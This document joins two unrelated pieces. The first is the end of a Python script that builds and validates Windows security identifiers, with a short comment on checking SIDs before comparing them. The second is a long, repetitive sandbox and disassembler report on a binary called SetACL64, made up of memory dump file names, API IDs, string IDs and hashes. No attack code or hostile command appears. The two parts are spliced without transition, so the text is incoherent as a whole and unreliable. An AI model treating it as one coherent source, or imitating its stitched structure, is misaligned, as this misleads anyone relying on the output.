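LOCAL_SYSTEM = build_sid(5, 18)            # S-1-5-18
ADMINISTRATORS = build_sid(5, 32, 544)     # S-1-5-32-544
TRUNCATED = ADMINISTRATORS[:-2]            # count promises 2 sub-authorities, buffer is short
BAD_REVISION = b"\x02" + LOCAL_SYSTEM[1:]  # revision byte is not 1


if __name__ == "__main__":
    print(sid_to_string(LOCAL_SYSTEM), sid_to_string(ADMINISTRATORS))
    print(compare_trustees(LOCAL_SYSTEM, LOCAL_SYSTEM + b"\x00\x00"))
    print(compare_trustees(ADMINISTRATORS, TRUNCATED))
    print(compare_trustees(LOCAL_SYSTEM, ADMINISTRATORS))
```

When you see this call pattern in a listing, the order matters: a caller that skips IsValidSid and goes straight to EqualSid is relying on undefined behaviour for malformed input, which is why the model returns False rather than comparing bytes when either side fails validation.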
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
                                                  • String ID: asio.system
                                                  • API String ID: 2324539378-4188385678
                                                  • Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                                  • Instruction ID: 5c9eaacc8a50bd4cb95683ef50ad814e1524de5431e02ad7b07ff4e5a5ab341d
                                                  • Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                                  • Instruction Fuzzy Hash: B7316F23A08A8281EF05BF17E5400B9E360EF8DBB0FA90131DA5D47797DEACE551C720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: \\?\UNC\
                                                  • API String ID: 2081738530-3025105874
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
                                                  • String ID:
                                                  • API String ID: 2376240148-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2384231905-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
                                                  • String ID:
                                                  • API String ID: 4071529928-0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                  • String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
                                                  • API String ID: 2967684691-1915342359
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C174835D
                                                  • GetLastError.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C174836B
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C1748395
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C17483DB
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7C174858A,?,?,?,00007FF7C1748284,?,?,?,?,00007FF7C1745001), ref: 00007FF7C17483E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide
                                                  • String ID:
                                                  • API String ID: 2829165498-0
                                                  APIs
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF7C172F5AD), ref: 00007FF7C1733B8B
                                                  • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF7C172F5AD), ref: 00007FF7C1733BAF
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Information
                                                  • String ID:
                                                  • API String ID: 2951059284-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                                  • String ID:
                                                  • API String ID: 3702003507-0
                                                  APIs
                                                  • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF7C171B638
                                                  • __std_exception_destroy.LIBVCRUNTIME ref: 00007FF7C171B675
                                                    • Part of subcall function 00007FF7C1742864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7C171ABCE,?,?,00000000,00007FF7C17010A5), ref: 00007FF7C1742874
                                                  Strings
                                                  • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF7C171B424
                                                  • bad exception, xrefs: 00007FF7C171B390
                                                  • D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF7C171B42F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_destroy$CriticalEnterSection
                                                  • String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                  • API String ID: 2585855615-497953542
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLast
                                                  • String ID: tss
                                                  • API String ID: 4252645092-1638339373
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175E97D
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7C175E8FB,?,?,?,00007FF7C1758743), ref: 00007FF7C175EA3C
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7C175E8FB,?,?,?,00007FF7C1758743), ref: 00007FF7C175EABC
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2210144848-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 1720291354-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                  • String ID: gfffffff$gfffffff
                                                  • API String ID: 73155330-161084747
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                  • API String ID: 3215553584-1196891531
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: $*
                                                  • API String ID: 3215553584-3982473090
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: -$e+000$gfff
                                                  • API String ID: 3215553584-2620144452
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFileLeaveModuleName_invalid_parameter_noinfo_noreturn
                                                  • String ID: .log
                                                  • API String ID: 3890993197-299349702
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: String$AllocFree$Uninitialize
                                                  • String ID: Jo
                                                  • API String ID: 3194604352-866799578
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: GenericMask
                                                  • String ID: 9$?
                                                  • API String ID: 3675760450-2473970582
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID:
                                                  • API String ID: 3936042273-0
                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_get_daylight
                                                  • String ID:
                                                  • API String ID: 72036449-0
                                                  • Opcode ID: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                                  • Instruction ID: 7d21e84ab38802357624a1afc25beee0000b3cf73c52503a83d56944a3ec8b2a
                                                  • Opcode Fuzzy Hash: c4ae961d942addcf2b134008d439d8ef08f12080ebcb94819dad5dfadd3a20b1
                                                  • Instruction Fuzzy Hash: 8851E332E0C22382F7257E2AD5043BAE5A0AB48734F998435DA4E476D7CEBDE850C761
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2401491561-0
                                                  • Opcode ID: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                                  • Instruction ID: 28aa5466005889d6543f83b22887e9ad6df58ccd005a34f7668a279422931fc2
                                                  • Opcode Fuzzy Hash: 1486c1b8983b2ca0bcc84f6bab691d8d42c10c3cc9c104c01906a72530798f0a
                                                  • Instruction Fuzzy Hash: 14313365B15A4681FF04AF5BE854238A311AF8DBB4FD44531C94D0BBA6DFACE4D48330
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Event$MutexObjectReleaseResetSingleWait
                                                  • String ID:
                                                  • API String ID: 2375943032-0
                                                  • Opcode ID: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                                  • Instruction ID: 28a54d9e8cf08c91a2d31f1d22cf4262ea7ad3317290fb848a3d6bf088e366d1
                                                  • Opcode Fuzzy Hash: 7b46ffe4c5099b2b667e965cb1ff3ada34845c803c41c1e8d10894002ef2c070
                                                  • Instruction Fuzzy Hash: 4B010C32614B4181DB04DF22E89433DB3A0FB88FA8F558131CA5D473A5DF78D895C350
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -log
                                                  • API String ID: 0-56760616
                                                  • Opcode ID: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                                  • Instruction ID: 5ec2f9435d4525066b806709dd454c3978f4cb22b73b77eda6e8266ea2d44eaa
                                                  • Opcode Fuzzy Hash: 1eecdd57994f2533d2a3b202c9ec56c7c722615268746318ca363c07f4b769d4
                                                  • Instruction Fuzzy Hash: 1591AD32B15B4189EB04EFA6D4402AC73B1EB49BB8F804136DE1E57BDADE78E545C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 1467352782-3733052814
                                                  • Opcode ID: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                                  • Instruction ID: d1e46890fca850b8e94c9f9f5ec8ac78006565f236b31f35af24adcd5b1292ec
                                                  • Opcode Fuzzy Hash: 140bdb4f9088bb5670319dceb203d8db25e3c3c3cfd3d3b344dc43606597f418
                                                  • Instruction Fuzzy Hash: 1171A332A0968186DB60AF26D49077DFBA1EB48FA4F948135EE8C47A86CB7CD451CF50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                                  • Instruction ID: e9f09080963b50715450cff7e6d005ed6faed860ad04c73ca17ca385ed5b6005
                                                  • Opcode Fuzzy Hash: 2b0c2825179cba656fd1c1b471b4941425bc7ec70a51c4e696d4729a40678a82
                                                  • Instruction Fuzzy Hash: 61515D36A08A45CAEB10DF66D0403ADB7A0F748B98F544536EF4D17B5ACFB8E055CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
